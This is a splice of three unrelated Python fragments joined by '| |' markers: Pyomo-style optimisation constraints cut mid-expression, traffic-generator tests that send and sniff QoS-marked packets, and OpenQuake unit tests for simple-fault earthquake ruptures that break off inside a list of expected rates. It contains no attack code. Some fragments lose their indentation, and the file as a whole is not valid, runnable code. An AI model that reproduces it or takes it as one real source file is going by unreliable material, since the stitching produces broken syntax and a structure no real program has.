# Next group: pairs over b111..b129 with pair variables b130 onward.
m.c3461 = Constraint(expr= - m.b111 + m.b112 - m.b130 <= 0)
m.c3462 = Constraint(expr= - m.b111 + m.b113 - m.b131 <= 0)
m.c3463 = Constraint(expr= - m.b111 + m.b114 - m.b132 <= 0)
m.c3464 = Constraint(expr= - m.b111 + m.b115 - m.b133 <= 0)
m.c3465 = Constraint(expr= - m.b111 + m.b116 - m.b134 <= 0)
m.c3466 = Constraint(expr= - m.b111 + m.b117 - m.b135 <= 0)
m.c3467 = Constraint(expr= - m.b111 + m.b118 - m.b136 <= 0)
m.c3468 = Constraint(expr= - m.b111 + m.b119 - m.b137 <= 0)
m.c3469 = Constraint(expr= - m.b111 + m.b120 - m.b138 <= 0)
m.c3470 = Constraint(expr= - m.b111 + m.b121 - m.b139 <= 0)
m.c3471 = Constraint(expr= - m.b111 + m.b122 - m.b140 <= 0)
m.c3472 = Constraint(expr= - m.b111 + m.b123 - m.b141 <= 0)
m.c3473 = Constraint(expr= - m.b111 + m.b124 - m.b142 <= 0)
m.c3474 = Constraint(expr= - m.b111 + m.b125 - m.b143 <= 0)
m.c3475 = Constraint(expr= - m.b111 + m.b126 - m.b144 <= 0)
m.c3476 = Constraint(expr= - m.b111 + m.b127 - m.b145 <= 0)
m.c3477 = Constraint(expr= - m.b111 + m.b128 - m.b146 <= 0)
m.c3478 = Constraint(expr= - m.b111 + m.b129 - m.b147 <= 0)
m.c3479 = Constraint(expr= - m.b112 + m.b113 - m.b148 <= 0)
m.c3480 = Constraint(expr= - m.b112 + m.b114 - m.b149 <= 0)
m.c3481 = Constraint(expr= - m.b112 + m.b115 - m.b150 <= 0)
m.c3482 = Constraint(expr= - m.b112 + m.b116 - m.b151 <= 0)
m.c3483 = Constraint(expr= - m.b112 + m.b117 - m.b152 <= 0)
m.c3484 = Constraint(expr= - m.b112 + m.b118 - m.b153 <= 0)
m.c3485 = Constraint(expr= - m.b112 + m.b119 - m.b154 <= 0)
m.c3486 = Constraint(expr= - m.b112 + m.b120 - m.b155 <= 0)
m.c3487 = Constraint(expr= - m.b112 + m.b121 - m.b156 <= 0)
m.c3488 = Constraint(expr= - m.b112 + m.b122 - m.b157 <= 0)
m.c3489 = Constraint(expr= - m.b112 + m.b123 - m.b158 <= 0)
m.c3490 = Constraint(expr= - m.b112 | |
{"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x00}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x0f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x1f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x20}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x30}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x3f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x40}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x5a}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x5f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x60}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x71}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x7f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x80}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x8f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0x9f}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xa0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xb3}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xbf}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xc0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xc5}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xdf}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xe0}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xe1}}, {"TCP": {}}))
pack_list.append(({"Ethernet": {"dst": dst_mac, "src": src_mac}}, {"IP": {"tos": 0xff}}, {"TCP": {}}))
packet_count = len(pack_list)
stream_ids = []
for pack in pack_list:
stream_ids.append(tg.set_stream(pack, count=1, iface=iface))
tg.set_qos_stat_type(iface, "IP")
tg.clear_statistics([iface])
tg.start_sniff([iface], sniffing_time=5)
tg.start_streams(stream_ids)
data = tg.stop_sniff([iface])
tg.stop_streams(stream_ids)
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
assert tg.get_received_frames_count(iface) == packet_count
for prio in range(8):
assert tg.get_qos_frames_count(iface, prio) == 3
def test_get_rate_stat(self, tg):
    """Check transmit rate reading.

    Each stream is started alone and then both together; the measured
    tx/rx rate must stay within the tolerance band around the nominal
    packets-per-second value implied by the stream interval.
    """
    if tg.type != "ixiahl":
        pytest.skip("Get port txrate increment isn't supported by Pypacker TG.")
    port = tg.ports[0]
    # inter=0.1 -> 10 pps, inter=0.05 -> 20 pps, both together -> 30 pps.
    slow_stream = tg.set_stream(ETH_IP_TCP, continuous=True, inter=0.1, iface=port)
    fast_stream = tg.set_stream(ETH_IP_TCP, continuous=True, inter=0.05, iface=port)
    cases = [([slow_stream], 10, 0.9, 1.1),
             ([fast_stream], 20, 0.95, 1.05),
             ([slow_stream, fast_stream], 30, 0.96, 1.04)]
    for streams, rate, low, high in cases:
        tg.start_streams(streams)
        time.sleep(1)
        assert rate * low <= tg.get_port_txrate(port) <= rate * high
        assert rate * low <= tg.get_port_rxrate(port) <= rate * high
        tg.stop_streams(streams)
def test_check_increment_ip_src(self, tg):
    """Check all fields in incremented packet. IP.src increment.

    Sends a stream with a source-IP increment and verifies the first
    captured frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 5
    mac_filter = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
    stream = tg.set_stream(DOT1Q_IP_UDP, count=expected, sip_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=2, src_filter=mac_filter)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(DOT1Q_IP_UDP, tg.packet_dictionary(captured[0]))
def test_check_increment_ip_dst(self, tg):
    """Check all fields in incremented packet. IP.dst increment.

    Sends a stream with a destination-IP increment and verifies the first
    captured frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 1
    mac_filter = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
    stream = tg.set_stream(DOT1Q_IP_UDP, count=expected, dip_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=2, src_filter=mac_filter)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(DOT1Q_IP_UDP, tg.packet_dictionary(captured[0]))
def test_check_increment_ip_dscp(self, tg):
    """Check all fields in incremented packet. IP.tos increment.

    Sends a stream with a DSCP increment and verifies the first captured
    frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 1
    mac_filter = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
    stream = tg.set_stream(DOT1Q_IP_UDP, count=expected, dscp_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=2, src_filter=mac_filter)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(DOT1Q_IP_UDP, tg.packet_dictionary(captured[0]))
def test_check_increment_ip_proto(self, tg):
    """Check all fields in incremented packet. IP.proto increment.

    Sends a stream with an IP-protocol increment and verifies the first
    captured frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 1
    mac_filter = DOT1Q_IP_UDP[0]["Ethernet"]["src"]
    stream = tg.set_stream(DOT1Q_IP_UDP, count=expected, protocol_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=2, src_filter=mac_filter)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(DOT1Q_IP_UDP, tg.packet_dictionary(captured[0]))
def test_check_increment_arp_hwsrc(self, tg):
    """Check all fields in incremented packet. ARP.hwsrc increment.

    Sends ``packet_count`` frames with an ARP source-MAC increment and
    verifies the sniffer captured all of them and the first frame matches
    the template packet.
    """
    iface = tg.ports[0]
    packet_count = 3
    src_mac = DOT1Q_ARP[0]["Ethernet"]["src"]
    # Use packet_count for the stream size instead of a duplicated literal.
    stream_id = tg.set_stream(DOT1Q_ARP, count=packet_count, arp_sa_increment=(2, 5), iface=iface)
    tg.start_sniff([iface], sniffing_time=3, src_filter=src_mac)
    tg.send_stream(stream_id)
    data = tg.stop_sniff([iface])
    packets = data.get(iface, [])
    # BUG FIX: the assertion compared against the literal 1 while its own
    # error message (and the sibling increment tests) use packet_count.
    assert len(packets) == packet_count, \
        "Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
    received = tg.packet_dictionary(packets[0])
    # Verify received packet is equal to sent packet
    self.verify_packets_data(DOT1Q_ARP, received)
def test_check_increment_arp_psrc(self, tg):
    """Check all fields in incremented packet. ARP.psrc increment.

    Sends a stream with an ARP source-IP increment and verifies the first
    captured frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 1
    mac_filter = DOT1Q_ARP[0]["Ethernet"]["src"]
    stream = tg.set_stream(DOT1Q_ARP, count=expected, arp_sip_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=3, src_filter=mac_filter)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(DOT1Q_ARP, tg.packet_dictionary(captured[0]))
def _send_igmp_and_verify(self, tg, iface, packet, packet_count):
    """Send *packet* with an IGMP-IP increment and verify the capture.

    Configures a stream of ``packet_count`` frames, sniffs with the
    shared SRC_MAC filter, and checks both the captured count and that
    the first captured frame matches the sent packet.
    """
    stream_id = tg.set_stream(packet, count=packet_count, igmp_ip_increment=(2, 5), iface=iface)
    tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
    tg.send_stream(stream_id)
    data = tg.stop_sniff([iface])
    packets = data.get(iface, [])
    assert len(packets) == packet_count, \
        "Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
    received = tg.packet_dictionary(packets[0])
    # Verify received packet is equal to sent packet
    self.verify_packets_data(packet, received)

def test_check_increment_igmp_ip(self, tg):
    """Check all fields in incremented packet. IGMP.ip increment.

    The identical send/sniff/verify sequence was repeated five times for
    different IGMP message types; it is now factored into
    ``_send_igmp_and_verify``.
    """
    iface = tg.ports[0]
    # Template packet as-is (single frame).
    self._send_igmp_and_verify(tg, iface, ETH_IP_IGMP, 1)
    # Same check for other IGMP types; type 34 also zeroes maxresp.
    for igmp_type, extra_fields in ((18, {}), (23, {}), (34, {"maxresp": 0})):
        packet = copy.deepcopy(ETH_IP_IGMP)
        packet[3]["IGMP"]["type"] = igmp_type
        packet[3]["IGMP"].update(extra_fields)
        self._send_igmp_and_verify(tg, iface, packet, 1)
    # Type 22 is exercised with a larger stream of 4 frames.
    packet = copy.deepcopy(ETH_IP_IGMP)
    packet[3]["IGMP"]["type"] = 22
    self._send_igmp_and_verify(tg, iface, packet, 4)
def test_check_increment_ip_icmp(self, tg):
    """Check all fields in incremented packet. IP.src increment.

    Same as the plain IP.src case but with an ICMP payload template.
    """
    port = tg.ports[0]
    expected = 1
    stream = tg.set_stream(ETH_IP_ICMP, count=expected, sip_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=3, src_filter=SRC_MAC)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(ETH_IP_ICMP, tg.packet_dictionary(captured[0]))
def test_check_increment_udp_sport(self, tg):
    """Check all fields in incremented packet. UDP.sport increment.

    Sends a stream with a UDP source-port increment and verifies the
    first captured frame still matches the template packet.
    """
    port = tg.ports[0]
    expected = 1
    stream = tg.set_stream(ETH_IP_UDP, count=expected, sudp_increment=(2, 5), iface=port)
    tg.start_sniff([port], sniffing_time=2, src_filter=SRC_MAC)
    tg.send_stream(stream)
    captured = tg.stop_sniff([port]).get(port, [])
    assert len(captured) == expected, \
        "Captured packets count {0} does not match expected {1}".format(len(captured), expected)
    # The first sniffed frame must carry exactly the data that was sent.
    self.verify_packets_data(ETH_IP_UDP, tg.packet_dictionary(captured[0]))
def test_check_increment_udp_dport(self, tg):
"""Check all fields in incremented packet. UDP.dport increment.
"""
iface = tg.ports[0]
packet_count = 1
stream_id = tg.set_stream(ETH_IP_UDP, count=packet_count, dudp_increment=(2, 5), iface=iface)
tg.start_sniff([iface], sniffing_time=2, src_filter=SRC_MAC)
tg.send_stream(stream_id)
data = tg.stop_sniff([iface])
packets = data.get(iface, [])
assert len(packets) == packet_count, \
"Captured packets count {0} does not match expected {1}".format(len(packets), packet_count)
received = tg.packet_dictionary(packets[0])
# Verify received packet | |
# The Hazard Library
# Copyright (C) 2012-2018 GEM Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import unittest
import numpy
from copy import deepcopy
from openquake.hazardlib.const import TRT
from openquake.hazardlib.source.simple_fault import SimpleFaultSource
from openquake.hazardlib.source.rupture import ParametricProbabilisticRupture
from openquake.hazardlib.mfd import TruncatedGRMFD, EvenlyDiscretizedMFD
import openquake.hazardlib.mfd.evenly_discretized as mfdeven
import openquake.hazardlib.scalerel.base as msr
import openquake.hazardlib.tom as tom
from openquake.hazardlib.scalerel import PeerMSR, WC1994
from openquake.hazardlib.geo import Point, Line
from openquake.hazardlib.tom import PoissonTOM
from openquake.hazardlib.tests import assert_angles_equal, assert_pickleable
from openquake.hazardlib.tests.geo.surface._utils import assert_mesh_is
from openquake.hazardlib.tests.source import \
_simple_fault_test_data as test_data
class _BaseFaultSourceTestCase(unittest.TestCase):
    """Shared fixtures and helpers for the simple-fault source tests."""

    TRT = TRT.ACTIVE_SHALLOW_CRUST
    RAKE = 0
    TOM = PoissonTOM(50.)

    def _make_source(self, mfd, aspect_ratio, fault_trace=None, dip=45):
        """Build a pickleable SimpleFaultSource with fixed test geometry.

        When *fault_trace* is not given, a short four-point default trace
        is used.
        """
        if fault_trace is None:
            fault_trace = Line([Point(0.0, 0.0),
                                Point(0.0, 0.0359728811758),
                                Point(0.0190775080917, 0.0550503815181),
                                Point(0.03974514139, 0.0723925718855)])
        source = SimpleFaultSource(
            'test-source',           # source_id
            'test-source',           # name
            self.TRT, mfd,
            1,                       # rupture_mesh_spacing
            PeerMSR(), aspect_ratio, self.TOM,
            0,                       # upper_seismogenic_depth
            4.2426406871192848,      # lower_seismogenic_depth
            fault_trace, dip, self.RAKE
        )
        assert_pickleable(source)
        return source

    def _test_ruptures(self, expected_ruptures, source):
        """Compare ``source.iter_ruptures()`` against *expected_ruptures*."""
        ruptures = list(source.iter_ruptures())
        for rupture in ruptures:
            self.assertIsInstance(rupture, ParametricProbabilisticRupture)
            self.assertIs(rupture.temporal_occurrence_model, self.TOM)
            self.assertIs(rupture.tectonic_region_type, self.TRT)
            self.assertEqual(rupture.rake, self.RAKE)
        self.assertEqual(len(expected_ruptures), source.count_ruptures())
        for i, expected in enumerate(expected_ruptures):
            rupture = ruptures[i]
            self.assertAlmostEqual(rupture.mag, expected['mag'])
            self.assertAlmostEqual(rupture.rake, expected['rake'])
            self.assertAlmostEqual(rupture.occurrence_rate,
                                   expected['occurrence_rate'])
            assert_mesh_is(self, rupture.surface, expected['surface'])
            self.assertEqual(rupture.hypocenter,
                             Point(*expected['hypocenter']))
            assert_angles_equal(self, rupture.surface.get_strike(),
                                expected['strike'], delta=0.5)
            assert_angles_equal(self, rupture.surface.get_dip(),
                                expected['dip'], delta=3)
class SimpleFaultIterRupturesTestCase(_BaseFaultSourceTestCase):
    """Rupture enumeration checks against precomputed expected data."""

    def _check_gr(self, expected, min_mag, max_mag, bin_width, aspect_ratio):
        """Run _test_ruptures for a truncated-GR source (a=0.5, b=1.0)."""
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=min_mag,
                             max_mag=max_mag, bin_width=bin_width)
        self._test_ruptures(expected,
                            self._make_source(mfd=mfd,
                                              aspect_ratio=aspect_ratio))

    def test_2(self):
        # Rupture dimensions exceed the mesh spacing; node counts along
        # strike and dip are even.
        self._check_gr(test_data.TEST2_RUPTURES, 3.0, 4.0, 1.0, 1.0)

    def test_3(self):
        # Rupture length exceeds the fault length; odd node count along
        # length, even along width.
        self._check_gr(test_data.TEST3_RUPTURES, 5.0, 6.0, 1.0, 4.0)

    def test_4(self):
        # Rupture width exceeds the fault width; even node count along
        # length, odd along width.
        self._check_gr(test_data.TEST4_RUPTURES, 5.4, 5.5, 0.1, 0.5)

    def test_5(self):
        # Rupture length and width both exceed the fault's dimensions.
        self._check_gr(test_data.TEST5_RUPTURES, 6.0, 7.0, 1.0, 1.0)

    def test_Pago_VeianoMontaguto(self):
        # Regression test using a real fault geometry: a single M6.9
        # rupture must be generated.
        trace = Line([Point(15.2368, 41.1594), Point(15.1848, 41.1644),
                      Point(15.1327, 41.1694), Point(15.0807, 41.1745),
                      Point(15.0286, 41.1795), Point(14.9765, 41.1846),
                      Point(14.9245, 41.1896), Point(14.8724, 41.1946),
                      Point(14.8204, 41.1997)])
        fault = SimpleFaultSource(
            'ITCS057', 'Pago Veiano-Montaguto', TRT.ACTIVE_SHALLOW_CRUST,
            EvenlyDiscretizedMFD(min_mag=6.9, bin_width=0.2,
                                 occurrence_rates=[1.0]),
            5,                    # rupture_mesh_spacing
            WC1994(),
            1,                    # rupture_aspect_ratio
            PoissonTOM(10),
            11.0,                 # upper_seismogenic_depth
            25.0,                 # lower_seismogenic_depth
            trace,
            70.0,                 # dip
            -130                  # rake
        )
        self.assertEqual(len(list(fault.iter_ruptures())), 1)
class SimpleFaultParametersChecksTestCase(_BaseFaultSourceTestCase):
    """Constructor-level validation errors of SimpleFaultSource."""

    def test_mesh_spacing_too_small(self):
        # The fixed 1 km mesh spacing cannot represent M1.5 ruptures.
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=0.5, max_mag=1.5,
                             bin_width=1.0)
        with self.assertRaises(ValueError) as ar:
            self._make_source(mfd=mfd, aspect_ratio=1.0)
        self.assertEqual(str(ar.exception),
                         'mesh spacing 1 is too high to represent '
                         'ruptures of magnitude 1.5')

    def test_fault_trace_intersects_itself(self):
        # A self-crossing trace must be rejected by the constructor.
        mfd = TruncatedGRMFD(a_val=0.5, b_val=1.0, min_mag=10, max_mag=20,
                             bin_width=1.0)
        trace = Line([Point(0, 0), Point(0, 1), Point(1, 1), Point(0, 0.5)])
        with self.assertRaises(ValueError) as ar:
            self._make_source(mfd=mfd, aspect_ratio=1, fault_trace=trace)
        self.assertEqual(str(ar.exception), 'fault trace intersects itself')
class HypoLocSlipRupture(unittest.TestCase):
def setUp(self):
    """Common source properties for the hypocentre/slip distribution tests."""
    # Set the source property
    # Magnitude-frequency distribution: a single M7.5 bin with rate 1.
    self.src_mfd = mfdeven.EvenlyDiscretizedMFD(7.5, 1., [1.])
    # NOTE(review): this binds the BaseMSR *class*, not an instance, and the
    # tests below pass self.sarea (WC1994) to the sources instead — confirm
    # self.src_msr is intentional/used.
    self.src_msr = msr.BaseMSR
    self.src_tom = tom.PoissonTOM(50)
    self.sarea = WC1994()
    self.upper_seismogenic_depth = 0.
    self.lower_seismogenic_depth = 40.
    self.dip = 90.
    self.rake = 0.
    self.mesh_spacing = 1.
    # One-degree east-west fault trace along the equator.
    self.fault_trace_start = Point(0.0, 0.0)
    self.fault_trace_end = Point(1.0, 0.0)
    self.fault_trace_nodes = [self.fault_trace_start, self.fault_trace_end]
    # Set the fault trace
    self.fault_trace = Line(self.fault_trace_nodes)
def test_hypoloc_vertical_rupture(self):
    """Check rupture hypocentres and rates for a vertical (dip=90) fault.

    The source carries a two-row hypocentre distribution (weights 0.4 and
    0.6) and a single slip direction; every rupture's hypocentre
    (longitude, latitude, depth) and occurrence rate is compared against
    the precomputed expected values below.
    """
    source_id = name = 'test-source'
    trt = TRT.ACTIVE_SHALLOW_CRUST
    # Rows are (along-strike fraction, down-dip fraction, weight); the
    # 0.4/0.6 weights split each rupture's rate between the two positions.
    hypo_list = numpy.array([[0.25, 0.25, 0.4], [0.75, 0.75, 0.6]])
    # Single slip direction: (angle in degrees, weight).
    slip_list = numpy.array([[90., 1.]])
    src = SimpleFaultSource(source_id, name, trt,
                            self.src_mfd, self.mesh_spacing,
                            self.sarea, 1., self.src_tom,
                            self.upper_seismogenic_depth,
                            self.lower_seismogenic_depth,
                            self.fault_trace, self.dip,
                            self.rake, hypo_list, slip_list)
    # Expected hypocentre longitudes, in src.iter_ruptures() order.
    lon = [0.11691180881629422, 0.35972864251163345, 0.12590502487907043,
           0.36872185857443507, 0.13489824094187208, 0.37771507463723675,
           0.14389145700464828, 0.38670829070001295, 0.15288467306744993,
           0.39570150676281457, 0.16187788913025158, 0.40469472282559077,
           0.17087110519302778, 0.41368793888839245, 0.17986432125582943,
           0.42268115495119407, 0.18885753731860563, 0.43167437101397027,
           0.19785075338140728, 0.44066758707677195, 0.20684396944418348,
           0.44966080313954815, 0.21583718550698514, 0.45865401920234977,
           0.22483040156978679, 0.46764723526512603, 0.23382361763256301,
           0.47664045132792765, 0.24281683369536466, 0.48563366739072933,
           0.25181004975814086, 0.49462688345350553, 0.26080326582094249,
           0.50362009951630715, 0.26979648188374417, 0.51261331557908341,
           0.27878969794652037, 0.52160653164188497, 0.28778291400932199,
           0.53059974770468665, 0.29677613007209824, 0.53959296376746291,
           0.30576934613489987, 0.54858617983026448, 0.31476256219770149,
           0.55757939589304073, 0.32375577826047774, 0.56657261195584241,
           0.33274899432327937, 0.57556582801864398, 0.34174221038605557,
           0.58455904408142023, 0.35073542644885725, 0.59355226014422191,
           0.35972864251163345, 0.60254547620699805, 0.36872185857443507,
           0.61153869226979973, 0.37771507463723675, 0.62053190833257599,
           0.38670829070001295, 0.62952512439537756, 0.39570150676281457,
           0.63851834045817923, 0.40469472282559077, 0.64751155652095549,
           0.41368793888839245, 0.65650477258375706, 0.42268115495119407,
           0.66549798864653331, 0.43167437101397027, 0.67449120470933499,
           0.44066758707677195, 0.68348442077213656, 0.44966080313954815,
           0.69247763683491281, 0.45865401920234977, 0.70147085289771449,
           0.46764723526512603, 0.71046406896049064, 0.47664045132792765,
           0.71945728502329231, 0.48563366739072933, 0.72845050108606846,
           0.49462688345350553, 0.73744371714887014, 0.50362009951630715,
           0.74643693321167182, 0.51261331557908341, 0.75543014927444796,
           0.52160653164188497, 0.76442336533724964, 0.53059974770468665,
           0.77341658140002589, 0.53959296376746291, 0.78240979746282757,
           0.54858617983026448, 0.79140301352562914, 0.55757939589304073,
           0.80039622958840539, 0.56657261195584241, 0.80938944565120707,
           0.57556582801864398, 0.81838266171398322, 0.58455904408142023,
           0.82737587777678498, 0.59355226014422191, 0.83636909383958657,
           0.60254547620699805, 0.84536230990236272, 0.61153869226979973,
           0.85435552596516445, 0.62053190833257599, 0.86334874202794054,
           0.62952512439537756, 0.87234195809074222, 0.63851834045817923,
           0.88133517415351847]
    # Expected latitudes: the trace lies on the equator, so all zero.
    lat = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
           0.0]
    # Expected depths alternate between the two hypocentre rows
    # (down-dip fractions 0.25 and 0.75 of the 40 km width).
    dep = [10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0,
           10.0, 30.0, 10.0, 30.0, 10.0, 30.0, 10.0, 30.0]
    # Expected occurrence rates alternate with the 0.4/0.6 hypocentre
    # weights applied to each rupture's base rate.
    rate = [0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
            0.0067796610169491532, 0.010169491525423728,
